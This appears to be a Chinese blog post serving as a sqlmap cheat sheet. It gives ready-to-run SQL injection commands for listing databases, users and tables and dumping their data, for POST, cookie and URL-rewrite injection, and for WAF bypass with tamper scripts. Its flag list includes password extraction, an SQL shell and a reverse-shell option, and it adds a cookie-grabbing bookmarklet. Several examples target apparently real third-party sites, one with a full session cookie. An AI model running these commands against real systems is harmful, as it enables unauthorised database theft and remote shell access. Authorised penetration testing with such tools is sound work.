1. 基础用法:

./sqlmap.py -u “注入地址” -v 1 –dbs               // 列举数据库
./sqlmap.py -u “注入地址” -v 1 –current-db       // 当前数据库
./sqlmap.py -u “注入地址” -v 1 –users            // 列数据库用户
./sqlmap.py -u “注入地址” -v 1 –current-user      // 当前用户
./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库”     // 列举数据库的表名
./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库”   // 获取表的列名
./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列
已经开始拖库了,它会将获取的数据存储sqlmap/output/中、、、

2. sqlmap post注入

1、burpsuite 安装sqlmap插件;
2、通过发送包,拷贝记录文档:

     ./sqlmap.py -r search-test.txt -p tfUPass
        -r  文件(请求数据)
        -p  测试注入参数

3、以get形式测试注入,如:

sqlmap -u "http://xxx.xxx.xxx/searchal.asp" --data="keyword=1&taocan=&zj=1&hy=&lx=&quyu=" --risk=0 --dbms="Microsoft SQL Server " --random-agent -P zj --cookie="ASPSESSIONIDSSACCCDC=DMELBEICFFKIOICOEFAKEPKG;Hm_lvt_b791e1acec17a3c88d09e242313471f3=1488784786;Hm_lpvt_b791e1acec17a3c88d09e242313471f3=1488784786;CNZZDATA1255292204=13161460-1488784711-%7C1488784711;_ga=GA1.2.737012416.1488784787;_gat=;"

3、sqlmap cookies注入

sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21" --level 2  

4. sqlmap遇到url重写的注入

哪里存在注入就加上 * 号
./sqlmap.py -u “http://www.cunlide.com/id1/1*/id2/2”

5.sqlmap 编码绕waf注入

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
**在sqlmap 的 tamper目录下有很多space2morehash.py 编码脚本自行加载**
参数:
--level
    >=2         检查cookie时面的参数
    >=3         检查User-agent和Referer
–current-user   #获取当前用户名称
–current-db     #获取当前数据库名称
–users          #列数据库用户
–dbs            #列数据库
–passwords      #数据库用户密码
–privileges     #查看权限
--is-dba        #是否试root
–sql-shell      #执行指定sql命令
–os-pwn         #反弹shell
–dbs-o “sqlmap.log”         #保存进度
-o “sqlmap.log” –resume     #恢复已保存进度
–smart–proxy”http://127.0.0.1:8118” #代理注入

获取cookie小技巧:

1.收藏夹添加一个链接cookies属性:
2.名字任意
3.地址:javascript:alert(document.cookie)
4.点一下获取当前cookie,复制对话框里的cookie值
    sqlmap.py -u http://x.x.x.x/Down.aspx?tid=2 -p tid –dbms mssql –cookie=”info=username=test”

本文由 秋边丶 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论